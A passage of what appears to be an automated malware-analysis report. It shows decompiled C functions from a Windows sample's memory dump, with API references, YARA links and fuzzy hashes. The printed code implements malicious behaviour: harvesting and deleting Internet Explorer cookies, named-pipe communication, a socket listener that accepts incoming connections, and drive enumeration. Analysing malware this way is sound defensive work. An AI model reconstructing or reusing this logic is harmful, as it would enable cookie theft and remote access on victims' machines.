        Function 0040AA33, Relevance: 15.1, APIs: 10, Instructions: 139filepipeCOMMON
        Download Yara Rule
        C-Code - Quality: 88%
        			E0040AA33(void* __eflags, long _a4, void _a8, void** _a12, long* _a16, void _a20, void _a24) {
				char _v5;
				void _v12;
				short _v532;
				long* _t67;
				void** _t69;
				long _t70;
				void* _t71;
				long _t73;
				void* _t74;

				_v12 = _v12 | 0xffffffff;
				_v5 = 1;
				E0040A739( &_v532, _a4);
				while(1) {
					_t71 = CreateFileW( &_v532, 0xc0000000, 3, 0, 3, 0, 0);
					if(_t71 != 0xffffffff) {
						break;
					}
					if(_v5 != 0) {
						WaitNamedPipeW( &_v532, 0xffffffff);
						_v5 = 0;
						continue;
					}
					L23:
					return _v12;
				}
				_a4 = 2;
				if(SetNamedPipeHandleState(_t71,  &_a4, 0, 0) != 0) {
					_push(0);
					_push( &_a4);
					_t73 = 4;
					if(WriteFile(_t71,  &_a8, _t73, ??, ??) != 0 && WriteFile(_t71,  &_a24, _t73,  &_a4, 0) != 0 && WriteFile(_t71, _a20, _a24,  &_a4, 0) != 0 && ReadFile(_t71,  &_v12, _t73,  &_a4, 0) != 0 && _a4 == _t73) {
						_a20 = 0;
						if(ReadFile(_t71,  &_a20, _t73,  &_a4, 0) == 0 || _a4 != _t73) {
							_v12 = _v12 | 0xffffffff;
						} else {
							_t62 = _a20;
							if(_a20 > 0) {
								_t74 = E0040F14B(_t62);
								if(_t74 == 0 || ReadFile(_t71, _t74, _a20,  &_a4, 0) == 0) {
									L19:
									_v12 = _v12 | 0xffffffff;
									goto L20;
								} else {
									_t70 = _a20;
									if(_t70 != _a4) {
										goto L19;
									} else {
										_t69 = _a12;
										if(_t69 == 0) {
											L20:
											E0040F15E(_t74);
										} else {
											_t67 = _a16;
											if(_t67 == 0) {
												goto L20;
											} else {
												 *_t69 = _t74;
												 *_t67 = _t70;
											}
										}
									}
								}
							}
						}
					}
				}
				CloseHandle(_t71);
				goto L23;
			}












        0x0040aa3c
        0x0040aa4c
        0x0040aa50
        0x0040aa79
        0x0040aa8e
        0x0040aa93
        0x00000000
        0x00000000
        0x0040aa61
        0x0040aa70
        0x0040aa76
        0x00000000
        0x0040aa76
        0x0040ab90
        0x0040ab97
        0x0040ab97
        0x0040aa9c
        0x0040aaab
        0x0040aab1
        0x0040aab5
        0x0040aab8
        0x0040aac7
        0x0040ab25
        0x0040ab30
        0x0040ab85
        0x0040ab37
        0x0040ab37
        0x0040ab3c
        0x0040ab43
        0x0040ab47
        0x0040ab79
        0x0040ab79
        0x00000000
        0x0040ab5d
        0x0040ab5d
        0x0040ab63
        0x00000000
        0x0040ab65
        0x0040ab65
        0x0040ab6a
        0x0040ab7d
        0x0040ab7e
        0x0040ab6c
        0x0040ab6c
        0x0040ab71
        0x00000000
        0x0040ab73
        0x0040ab73
        0x0040ab75
        0x0040ab75
        0x0040ab71
        0x0040ab6a
        0x0040ab63
        0x0040ab47
        0x0040ab3c
        0x0040ab30
        0x0040aac7
        0x0040ab8a
        0x00000000

        APIs
          • Part of subcall function 0040A739: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 0040A742
          • Part of subcall function 0040A739: lstrcpyW.KERNEL32(?,?), ref: 0040A750
        • WaitNamedPipeW.KERNEL32(?,000000FF,?,?,00000000), ref: 0040AA70
        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040AA88
        • SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040AAA3
        • WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 0040AABF
        • WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AAD8
        • WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AAF2
        • ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040AB0B
        • ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AB28
        • ReadFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AB53
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040AB8A
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$ReadWrite$HandleNamedPipelstrcpy$CloseCreateFreeHeapStateWait
        • String ID:
        • API String ID: 34731080-0
        • Opcode ID: 184f8cf6fc59975507e9ed02efdd8c0e894f587f69fc86c87007a8dc6aafcc23
        • Instruction ID: 68feef118c699048b2a897f71f9ab120b5d43b8b440629adc0ec0de95e345929
        • Opcode Fuzzy Hash: 184f8cf6fc59975507e9ed02efdd8c0e894f587f69fc86c87007a8dc6aafcc23
        • Instruction Fuzzy Hash: 4D413A72100209BBDB119FA4DC84DEF3B7DAB453A0F008136FA15E62D0D674DAA5CBA6
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040AEF2, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122stringCOMMON
        Download Yara Rule
        C-Code - Quality: 97%
        			E0040AEF2(short* __edx) {
				long _v8;
				char _v12;
				short _v112;
				short _v632;
				signed char _t32;
				long _t39;
				intOrPtr _t41;
				long _t44;
				intOrPtr _t48;
				unsigned int _t50;
				long _t54;
				intOrPtr _t60;
				long _t63;
				void* _t67;
				short* _t70;
				void* _t73;
				CHAR* _t74;

				_t70 = __edx;
				_t32 =  *0x414be8; // 0x0
				asm("sbb esi, esi");
				_v8 = 0x206;
				_t73 =  ~(_t32 & 1) + 0x80000002;
				E0040F21C( &_v632,  &_v632, 0, 0x208);
				if(__edx == 0xffffffff) {
					L9:
					_v8 = 0x31;
					if(GetComputerNameW( &_v112,  &_v8) == 0) {
						lstrcpyW( &_v112, L"unknown");
					}
					_t39 = GetTickCount();
					_t41 =  *0x414ad4; // 0x241f5a8
					_t44 = wnsprintfW( &_v632, 0x103,  *(_t41 + 0x58),  &_v112, _t39) + _t43;
					L12:
					_v8 = _t44 + 2;
					_t48 =  *0x414ad4; // 0x241f5a8
					E0040861B(_t73,  *((intOrPtr*)(_t48 + 0x34)),  *((intOrPtr*)(_t48 + 0x38)), 1,  &_v632, _t44 + 2);
					_t50 = _v8;
					L13:
					_v8 = (_t50 >> 1) - 1;
					_t74 = E0040F583((_t50 >> 1) - 1,  &_v632);
					_t54 = CharLowerBuffA(_t74, _v8);
					_t67 = 0;
					if(_v8 <= 0) {
						L20:
						 *0x414d10 = _t74;
						return _t54;
					} else {
						goto L14;
					}
					do {
						L14:
						_t54 =  *((intOrPtr*)(_t67 + _t74));
						if(_t54 < 0x61 || _t54 > 0x7a) {
							if(_t54 < 0x30 || _t54 > 0x39) {
								 *((char*)(_t67 + _t74)) = 0x5f;
							}
						}
						_t67 = _t67 + 1;
					} while (_t67 < _v8);
					goto L20;
				}
				if(__edx == 0 ||  *__edx == 0) {
					_t60 =  *0x414ad4; // 0x241f5a8
					if(E004085D2(_t73,  *((intOrPtr*)(_t60 + 0x34)),  *((intOrPtr*)(_t60 + 0x38)),  &_v12,  &_v632,  &_v8) != 0 && _v12 == 1) {
						_t50 = _v8;
						if(_t50 > 4) {
							goto L13;
						}
					}
					goto L9;
				} else {
					_t63 = E0040F649(__edx) + _t62;
					_v8 = _t63;
					if(_t63 >= 0x204) {
						_t63 = 0x204;
					}
					E0040F19A( &_v632, _t70, _t63);
					_t44 = _v8;
					goto L12;
				}
			}




















        0x0040aef2
        0x0040aefb
        0x0040af15
        0x0040af18
        0x0040af1f
        0x0040af25
        0x0040af2d
        0x0040af98
        0x0040afa0
        0x0040afaf
        0x0040afba
        0x0040afba
        0x0040afc0
        0x0040afcb
        0x0040afe8
        0x0040afea
        0x0040afed
        0x0040aff7
        0x0040b005
        0x0040b00a
        0x0040b00d
        0x0040b017
        0x0040b022
        0x0040b025
        0x0040b02b
        0x0040b030
        0x0040b04f
        0x0040b04f
        0x0040b057
        0x00000000
        0x00000000
        0x00000000
        0x0040b032
        0x0040b032
        0x0040b032
        0x0040b037
        0x0040b03f
        0x0040b045
        0x0040b045
        0x0040b03f
        0x0040b049
        0x0040b04a
        0x00000000
        0x0040b032
        0x0040af31
        0x0040af75
        0x0040af88
        0x0040af90
        0x0040af96
        0x00000000
        0x00000000
        0x0040af96
        0x00000000
        0x0040af39
        0x0040af40
        0x0040af47
        0x0040af4c
        0x0040af4e
        0x0040af4e
        0x0040af59
        0x0040af5e
        0x00000000
        0x0040af5e

        APIs
        • GetComputerNameW.KERNEL32(?,00000206), ref: 0040AFA7
        • lstrcpyW.KERNEL32(?,unknown), ref: 0040AFBA
        • GetTickCount.KERNEL32 ref: 0040AFC0
        • wnsprintfW.SHLWAPI ref: 0040AFDF
        • CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 0040B025
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: BuffCharComputerCountLowerNameTicklstrcpywnsprintf
        • String ID: 1$andle$unknown
        • API String ID: 2565877886-336978794
        • Opcode ID: b3c9355ab330fbde3ccf396519293f0bb69027f813ebc6933952a9e13373b0d1
        • Instruction ID: 6c248ed7dd9890e06c8fd7869b10a429f201529412d380f689f1795a1126b4c9
        • Opcode Fuzzy Hash: b3c9355ab330fbde3ccf396519293f0bb69027f813ebc6933952a9e13373b0d1
        • Instruction Fuzzy Hash: 35419CB2900219AFCF10EBA4CE48ADE77BDEB44304F1041BAE515E7292D7399B45CB99
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004094DE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119synchronizationthreadnetworkCOMMON
        Download Yara Rule
        C-Code - Quality: 31%
        			E004094DE() {
				intOrPtr _v12;
				short* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				short _v46;
				char _v48;
				short _v86;
				char _v88;
				signed int _v348;
				signed int _v352;
				void* __edi;
				short _t39;
				signed int _t40;
				signed int _t42;
				void* _t47;
				intOrPtr* _t52;
				intOrPtr _t62;
				void* _t67;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				void* _t72;

				_v20 = 0;
				_v16 = 0x414a38;
				_v12 = E00409492;
				E0040F21C( &_v88,  &_v88, 0, 0x26);
				_t39 = 2;
				_v88 = _t39;
				_t68 = 0x9c40;
				while(1) {
					_t40 = E0041025C();
					asm("rol dx, 0x8");
					_v86 = _t40 % 0x7531 + 0x2710;
					_t42 = E004106C8( &_v88, 0x10, 0x7fffffff);
					if(_t42 != 0xffffffff) {
						break;
					}
					_t68 = _t68 - 1;
					if(_t68 > 0) {
						continue;
					} else {
						_t69 = _t68 | _t42;
						L4:
						if(_t69 != 0xffffffff) {
							_push( &_v24);
							_push( &_v48);
							_push(_t69);
							_v24 = 0x10;
							if( *0x414ce8() == 0) {
								asm("rol ax, 0x8");
								_v20 = _t69;
								 *0x414a38 = _v46;
							}
						}
						_v32 = 0;
						_v28 = 0xf4240;
						while(WaitForSingleObject( *0x414a30, 0x64) != 0) {
							_v348 = _v20;
							_v352 = 1;
							_t47 =  *0x414cf8(0,  &_v352, 0, 0,  &_v32);
							if(_t47 == 0xffffffff) {
								break;
							}
							if(_t47 <= 0) {
								continue;
							}
							L19:
							while(_v352 != 0) {
								_v352 = _v352 - 1;
								_t62 =  *((intOrPtr*)(_t72 + _v352 * 4 - 0x158));
								_t70 = 0;
								_t52 =  &_v20;
								while(_t62 !=  *_t52) {
									_t70 = _t70 + 1;
									_t52 = _t52 + 0xc;
									if(_t70 < 1) {
										continue;
									}
									goto L19;
								}
								_t71 = _t70 * 0xc;
								_t67 =  *0x414cd0( *((intOrPtr*)(_t72 + _t70 * 0xc - 0x10)), 0, 0);
								if(_t67 != 0xffffffff) {
									 *0x414a2c =  *0x414a2c + 1;
									if(E0040B81A(_t62,  *((intOrPtr*)(_t72 + _t71 - 8)), _t67) == 0) {
										 *0x414cb0(_t67);
										 *0x414a2c =  *0x414a2c - 1;
									}
								}
							}
						}
						 *0x414cb0(_v20);
						 *0x414a2c =  *0x414a2c - 1;
						_push(0);
						RtlExitUserThread();
						return 0;
					}
				}
				_t69 = _t42;
				goto L4;
			}



























        0x004094f3
        0x004094f6
        0x004094fd
        0x00409504
        0x0040950b
        0x0040950c
        0x00409510
        0x00409515
        0x00409515
        0x00409533
        0x00409537
        0x0040953b
        0x00409543
        0x00000000
        0x00000000
        0x00409545
        0x00409548
        0x00000000
        0x0040954a
        0x0040954a
        0x0040954c
        0x0040954f
        0x00409554
        0x00409558
        0x00409559
        0x0040955a
        0x00409569
        0x0040956f
        0x00409573
        0x00409576
        0x00409576
        0x00409569
        0x0040957c
        0x0040957f
        0x0040962b
        0x00409592
        0x004095a6
        0x004095b0
        0x004095b9
        0x00000000
        0x00000000
        0x004095c1
        0x00000000
        0x00000000
        0x00000000
        0x00409623
        0x004095c5
        0x004095d1
        0x004095d8
        0x004095da
        0x004095dd
        0x004095e1
        0x004095e2
        0x004095e8
        0x00000000
        0x00000000
        0x00000000
        0x004095ea
        0x004095ec
        0x004095fb
        0x00409600
        0x00409602
        0x00409614
        0x00409617
        0x0040961d
        0x0040961d
        0x00409614
        0x00409600
        0x00409623
        0x00409644
        0x0040964a
        0x00409650
        0x00409651
        0x0040965d
        0x0040965d
        0x00409548
        0x0040958b
        0x00000000

        APIs
          • Part of subcall function 0041025C: GetTickCount.KERNEL32 ref: 0041025C
          • Part of subcall function 004106C8: socket.WS2_32(?,00000001,00000006), ref: 004106D1
          • Part of subcall function 004106C8: bind.WS2_32(00000000,?,?), ref: 004106E4
          • Part of subcall function 004106C8: listen.WS2_32(00000000,?), ref: 004106F3
          • Part of subcall function 004106C8: closesocket.WS2_32(00000000), ref: 004106FE
        • getsockname.WS2_32(00000000,?,?), ref: 00409561
        • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004095B0
        • accept.WS2_32(?,00000000,00000000), ref: 004095F5
        • closesocket.WS2_32(00000000), ref: 00409617
        • WaitForSingleObject.KERNEL32(00000064,00000010,7FFFFFFF,?,00000000,00000026), ref: 00409633
        • closesocket.WS2_32(?), ref: 00409644
        • RtlExitUserThread.NTDLL(00000000), ref: 00409651
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: closesocket$CountExitObjectSingleThreadTickUserWaitacceptbindgetsocknamelistenselectsocket
        • String ID: atorA
        • API String ID: 1067960629-3648288836
        • Opcode ID: f565c23cd2c9270926fc16f2da1049be0ff06bbe74df269502180013479bae07
        • Instruction ID: ba1636c0d4c5ff6d05124c7d3a83ea0720aeacb155258f12bb8462978c2da3aa
        • Opcode Fuzzy Hash: f565c23cd2c9270926fc16f2da1049be0ff06bbe74df269502180013479bae07
        • Instruction Fuzzy Hash: 4C41B072900518AFDB109FA9DC889EE7778FF88354F11453AE815F22D1E3794D458B98
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00411F19, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 113filepipeCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00411F19(intOrPtr _a4, char _a7, intOrPtr _a8, void** _a12) {
				long _v8;
				struct _OVERLAPPED* _v12;
				void _v16;
				char _v518;
				short _v536;
				intOrPtr* _t28;
				int _t35;
				void** _t54;
				void* _t61;
				void* _t66;

				_t28 = _a12;
				if(_t28 != 0) {
					 *_t28 = 0;
				}
				E0040F19A( &_v536, L"\\\\.\\pipe\\", 0x12);
				_v518 = 0;
				E0040F2AA(0xffffffff, _a4,  &_v518);
				_a7 = 0;
				while(1) {
					_t35 = CreateFileW( &_v536, 0xc0000000, 3, 0, 3, 0, 0);
					_t61 = _t35;
					if(_t61 != 0xffffffff) {
						break;
					}
					if(_a7 == 1) {
						L14:
						return _t35;
					}
					WaitNamedPipeW( &_v536, 0xffffffff);
					_a7 = _a7 + 1;
				}
				_v8 = 2;
				if(SetNamedPipeHandleState(_t61,  &_v8, 0, 0) == 0) {
					L13:
					_t35 = CloseHandle(_t61);
					goto L14;
				}
				_v16 = _a8;
				_v12 = 0;
				if(WriteFile(_t61,  &_v16, 8,  &_v8, 0) == 0 || ReadFile(_t61,  &_v16, 8,  &_v8, 0) == 0 || _v8 != 8) {
					goto L13;
				} else {
					_t48 =  &(_v12->Internal);
					if( &(_v12->Internal) != 0) {
						_t66 = E0040F14B(_t48);
						if(_t66 == 0 || ReadFile(_t61, _t66, _v12,  &_v8, 0) == 0 || _v12 != _v8) {
							L12:
							E0040F15E(_t66);
						} else {
							_t54 = _a12;
							if(_t54 != 0) {
								 *_t54 = _t66;
							}
						}
						goto L13;
					}
					_t66 = 0;
					goto L12;
				}
			}













        0x00411f1c
        0x00411f2c
        0x00411f2e
        0x00411f2e
        0x00411f3e
        0x00411f48
        0x00411f58
        0x00411f5d
        0x00411f83
        0x00411f92
        0x00411f98
        0x00411f9d
        0x00000000
        0x00000000
        0x00411f6b
        0x00412009
        0x0041200d
        0x0041200d
        0x00411f7a
        0x00411f80
        0x00411f80
        0x00411fa6
        0x00411fb5
        0x00412002
        0x00412003
        0x00000000
        0x00412003
        0x00411fbb
        0x00411fc9
        0x00411fd4
        0x00000000
        0x00411ff2
        0x00411ff5
        0x00411ff8
        0x00412015
        0x00412019
        0x00411ffc
        0x00411ffd
        0x00412037
        0x00412037
        0x0041203c
        0x0041203e
        0x0041203e
        0x0041203c
        0x00000000
        0x00412019
        0x00411ffa
        0x00000000
        0x00411ffa

        APIs
        • WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00411F7A
        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,004040BC,00000000), ref: 00411F92
        • SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 00411FAD
        • WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411FCC
        • ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411FE2
        • CloseHandle.KERNEL32(00000000), ref: 00412003
        • ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 00412025
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$HandleNamedPipeRead$CloseCreateStateWaitWrite
        • String ID: \\.\pipe\
        • API String ID: 223520675-91387939
        • Opcode ID: 333c9014d26c880eb3c1fe1abc07d69c8a3bb24170e61119fc5089765fa7e023
        • Instruction ID: 2367e7ad7dab588756f6e2333cf80714741152095c4ab82e5a22b9ab975fea82
        • Opcode Fuzzy Hash: 333c9014d26c880eb3c1fe1abc07d69c8a3bb24170e61119fc5089765fa7e023
        • Instruction Fuzzy Hash: 9C318D72500218AFDB21DFA4CD89EEF7BBCAB45354F008576F615E6190D7B48E85CB28
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00404EA2, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104COMMON
        Download Yara Rule
        C-Code - Quality: 92%
        			E00404EA2(void* __ecx, signed int* __edi, signed char _a4, signed int* _a8) {
				signed int _v528;
				short _v536;
				intOrPtr _v540;
				long _v544;
				char _v545;
				intOrPtr _v548;
				intOrPtr _v552;
				void* _v556;
				char _v557;
				void* _v560;
				intOrPtr _v561;
				intOrPtr _v564;
				long _v568;
				signed int _t35;
				void* _t39;
				signed int _t55;
				intOrPtr _t70;
				signed int* _t71;
				struct _GOPHER_FIND_DATAA _t73;

				_t71 = __edi;
				_t66 = __ecx;
				_t35 = _a4 & 0x00000001;
				_v528 = _t35;
				if(_t35 != 0) {
					 *_a8 =  *_a8 & 0x00000000;
					 *__edi =  *__edi & 0x00000000;
				}
				_v545 = 1;
				_t73 = E0040F14B(0x1000);
				_v544 = 0x1000;
				 *_t73 = 0x50;
				_t39 = FindFirstUrlCacheEntryW(L"cookie:", _t73,  &_v544);
				_v544 = _t39;
				if(_t39 == 0) {
					L14:
					E0040F15E(_t73);
					return _v561;
				} else {
					do {
						_t81 = _v540;
						if(_v540 == 0) {
							__eflags = _a4 & 0x00000002;
							if(__eflags == 0) {
								 *0x414b48( *((intOrPtr*)(_t73 + 4)));
							} else {
								PathCombineW( &_v536, L"ie_cookies", PathFindFileNameW( *(_t73 + 8)));
								E00413599(_t66, _t70, __eflags,  *(_t73 + 8), 0,  &_v544);
							}
							goto L10;
						}
						_t66 = E00404D44(_t66, _t81,  *(_t73 + 8));
						_v556 = _t66;
						if(_t66 == 0) {
							goto L10;
						}
						_v548 = E0040F637(_t66);
						_t55 = E0040F117( *_t71 + _v548,  *_a8);
						if(_t55 == 0) {
							_v557 = 0;
							E0040F15E(_v552);
							E0040F15E( *_a8);
							L13:
							FindCloseUrlCache(_v560);
							goto L14;
						}
						_t70 = _v548;
						 *_a8 = _t55;
						_t66 =  *_t71 + _t55;
						E0040F19A( *_t71 + _t55, _v552, _t70);
						 *_t71 =  *_t71 + _t70;
						E0040F15E(_v564);
						L10:
						_v560 = 0x1000;
						 *_t73 = 0x50;
						E0040F20A(_t73, 0x1000);
					} while (FindNextUrlCacheEntryW(_v556, _t73,  &_v568) != 0);
					goto L13;
				}
			}






















        0x00404ea2
        0x00404ea2
        0x00404eb2
        0x00404eb6
        0x00404eba
        0x00404ebf
        0x00404ec2
        0x00404ec2
        0x00404ecc
        0x00404ed6
        0x00404ede
        0x00404ee7
        0x00404eed
        0x00404ef3
        0x00404ef9
        0x00404fe9
        0x00404fea
        0x00404ff8
        0x00404eff
        0x00404eff
        0x00404eff
        0x00404f04
        0x00404f62
        0x00404f66
        0x00404f96
        0x00404f68
        0x00404f7c
        0x00404f8c
        0x00404f8c
        0x00000000
        0x00404f66
        0x00404f0e
        0x00404f10
        0x00404f16
        0x00000000
        0x00000000
        0x00404f26
        0x00404f30
        0x00404f37
        0x00404fcb
        0x00404fd0
        0x00404fda
        0x00404fdf
        0x00404fe3
        0x00000000
        0x00404fe3
        0x00404f40
        0x00404f44
        0x00404f4d
        0x00404f50
        0x00404f59
        0x00404f5b
        0x00404f9c
        0x00404f9d
        0x00404fa2
        0x00404fa8
        0x00404fbd
        0x00000000
        0x00404fc5

        APIs
        • FindFirstUrlCacheEntryW.WININET(cookie:,00000000,?), ref: 00404EED
        • PathFindFileNameW.SHLWAPI(?), ref: 00404F6B
        • PathCombineW.SHLWAPI(?,ie_cookies,00000000), ref: 00404F7C
        • DeleteUrlCacheEntryW.WININET(?), ref: 00404F96
        • FindNextUrlCacheEntryW.WININET(?,00000000,?), ref: 00404FB7
        • FindCloseUrlCache.WININET(?), ref: 00404FE3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CacheFind$Entry$Path$CloseCombineDeleteFileFirstNameNext
        • String ID: cookie:$ie_cookies
        • API String ID: 468235262-2556801673
        • Opcode ID: e1b0951da6e20bdc73e7b5051e233c88f39d68b7a510ebff04a43dcf9728c26b
        • Instruction ID: 0dbd61b364be1afa4da7cf897d3fe2c6a5dce73051ca318ceb383ca2977cfdd4
        • Opcode Fuzzy Hash: e1b0951da6e20bdc73e7b5051e233c88f39d68b7a510ebff04a43dcf9728c26b
        • Instruction Fuzzy Hash: 9D4181B1108342EFC710AF65C845B5BBBE4BF84308F00883EF995A66A1D739D954CB96
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00409EBA, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82networkCOMMON
        Download Yara Rule
        C-Code - Quality: 71%
        			E00409EBA(char _a4) {
				char _v9;
				char _v16;
				char _v416;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t23;
				char _t28;
				signed char _t34;
				void* _t40;
				void* _t45;
				void* _t48;

				_t19 =  *0x414b7c; // 0x418000
				_t1 = _t19 + 0x26; // 0x200001a
				_t2 = _t19 + 0x24; // 0x1a001e
				_t40 = ( *_t1 & 0x000000ff) + _t19;
				_t3 = _t19 + 0x25; // 0x1a00
				_t20 =  *_t3;
				_t5 = _t40 + 0x12c; // 0x1a014a
				_t45 = ( *_t2 & 0x000000ff) + _t5;
				_t41 = 0;
				_v9 = 0;
				if(_t20 > 0) {
					while(1) {
						_t48 =  *((intOrPtr*)(_t45 + (_t41 & 0x000000ff) * 2)) -  *0x414b64; // 0x409
						if(_t48 == 0) {
							break;
						}
						_t41 = _t41 + 1;
						if(_t41 < _t20) {
							continue;
						} else {
						}
						goto L5;
					}
					_v9 = 1;
				}
				L5:
				L00404155();
				 *0x414ed4("mID");
				 *0x414a2c =  *0x414a2c + 1;
				_t23 = E0040B81A(_t41, E00404566, 0x4147a2);
				if(_v9 == 0) {
					E00409D7D();
					 *0x414cd4(0x202,  &_v416);
					 *0x414a2c =  *0x414a2c + 1;
					E0040B81A(_t41, E004094DE, 0);
					_t28 =  *0x414a30; // 0x2210041
					_v16 = _t28;
					E004131E7();
					 *0x414a2c =  *0x414a2c + 1;
					E0040B81A(_t41, E00409B83, 0x4147a2);
					 *0x414a2c =  *0x414a2c + 1;
					 *0x414ed4("pVirtualKeyExA", _a4,  &_v16);
					 *0x414a2c =  *0x414a2c + 1;
					 *0x41477c = 0;
					 *0x414778 = 0;
					_a4 = 0;
					_t34 = E004089BF( &_a4, _t41, 0, "PopOpO03-3331111");
					_t51 = _t34;
					if(_t34 != 0) {
						_t41 = _t34;
						E00404BB0(_a4, _t34, _t51);
						E0040F15E(_a4);
					}
					_t23 = E0040B81A(_t41, E00404AE9, "atorA");
					if(_t23 != 0) {
						 *0x414a2c =  *0x414a2c - 1;
						return _t23;
					}
				}
				return _t23;
			}














        0x00409ec3
        0x00409ec8
        0x00409ecc
        0x00409ed0
        0x00409ed2
        0x00409ed2
        0x00409ed9
        0x00409ed9
        0x00409ee0
        0x00409ee2
        0x00409ee7
        0x00409ee9
        0x00409ef0
        0x00409ef7
        0x00000000
        0x00000000
        0x00409ef9
        0x00409efd
        0x00000000
        0x00000000
        0x00409eff
        0x00000000
        0x00409efd
        0x00409f01
        0x00409f01
        0x00409f05
        0x00409f05
        0x00409f0f
        0x00409f15
        0x00409f26
        0x00409f2e
        0x00409f34
        0x00409f45
        0x00409f4b
        0x00409f57
        0x00409f5c
        0x00409f61
        0x00409f6b
        0x00409f70
        0x00409f7c
        0x00409f81
        0x00409f8c
        0x00409f92
        0x00409fa1
        0x00409fa7
        0x00409fad
        0x00409fb0
        0x00409fb5
        0x00409fb7
        0x00409fb9
        0x00409fbe
        0x00409fc6
        0x00409fc6
        0x00409fd5
        0x00409fdc
        0x00409fde
        0x00000000
        0x00409fde
        0x00409fdc
        0x00409fe7

        APIs
        • RtlInitializeCriticalSection.NTDLL(mID), ref: 00409F0F
        • WSAStartup.WS2_32(00000202,?), ref: 00409F45
        • RtlInitializeCriticalSection.NTDLL(pVirtualKeyExA), ref: 00409F8C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalInitializeSection$Startup
        • String ID: PopOpO03-3331111$atorA$mID$pVirtualKeyExA$ryStringW
        • API String ID: 100036477-3181093921
        • Opcode ID: 62d89d21265509a90513e9c91e3d6b4f32a397d77a30ef88d652db42a77146e3
        • Instruction ID: 3a7d11628b0fedcfdf00002fd124bfa51147fc8327f54dfd2345d0619440542b
        • Opcode Fuzzy Hash: 62d89d21265509a90513e9c91e3d6b4f32a397d77a30ef88d652db42a77146e3
        • Instruction Fuzzy Hash: B631B672640204ABC7016FE5DC81DEA7BB9EF89341B01C07BF555A62E3D7788941CB5D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00404AE9, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69threadsynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 95%
        			E00404AE9(intOrPtr* _a4) {
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _v24;
				short _t23;
				short _t24;
				int _t27;
				signed char _t33;
				intOrPtr* _t42;

				SetThreadPriority(GetCurrentThread(), 0xfffffff1);
				_t42 = _a4;
				while(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
					if( *0x414778 != 0) {
						_v24 = GetLogicalDrives();
						_t33 = 2;
						do {
							if((_v24 & 1 << _t33) == 0) {
								goto L7;
							} else {
								_v20 = (_t33 & 0x000000ff) + 0x41;
								_t23 = 0x3a;
								_v18 = _t23;
								_t24 = 0x5c;
								_v16 = _t24;
								_v14 = 0;
								_t27 = GetDriveTypeW( &_v20);
								if(_t27 == 3 || _t27 == 2) {
									E004048AC( &_v20, _t42);
									if(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
										goto L7;
									}
								} else {
									goto L7;
								}
							}
							goto L9;
							L7:
							_t33 = _t33 + 1;
						} while (_t33 < 0x20);
					}
				}
				L9:
				 *_t42 =  *_t42 - 1;
				_push(0);
				return RtlExitUserThread();
			}













        0x00404afe
        0x00404b04
        0x00404b8b
        0x00404b15
        0x00404b1d
        0x00404b21
        0x00404b23
        0x00404b30
        0x00000000
        0x00404b32
        0x00404b3c
        0x00404b41
        0x00404b42
        0x00404b49
        0x00404b4a
        0x00404b51
        0x00404b5b
        0x00404b64
        0x00404b71
        0x00404b82
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
